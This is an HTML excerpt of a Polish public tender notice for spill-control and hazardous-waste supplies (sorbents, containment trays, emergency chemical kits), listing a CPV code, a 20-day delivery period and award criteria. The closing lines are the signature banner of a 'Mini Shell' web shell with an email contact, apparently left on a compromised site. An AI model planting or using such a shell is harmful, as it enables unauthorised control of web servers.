<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiot zamówienia obejmuje dostawę następującego asortymentu: beczka na stłuczone świetlówki, niskie wyłapujące wanny polietylenowe pod 4 beczki, kosze zabezpieczające na materiały łatwopalne, wyłapujące kanistry, plastikowe konewki z miarką , apteczki ekologiczne do oleju,  wanienki wychwytowe pod pojazdy, pojemniki mobilne na odpady niebezpieczne, apteczki ekologiczne ADR do oleju, stojaki na matę sorpcyjną w formie rolki, awaryjny zestaw chemiczny, mobilny, wanny wyłapujące elastyczne, składane, siarka granulowana, maty sorpcyjne do oleju, worki na odpady, sorbent sypki do oleju, ścierki sorpcyjne i in.
b) Szczegółowy opis przedmiotu zamówienia dla części nr 4 w zakresie wymogów co do rodzaju asortymentu, jego ilości oraz parametrów technicznych przedstawiony został w Załączniku nr 1D do SIWZ. Załącznik ten stanowi równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Najkrótszy termin wykonania zamówineia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com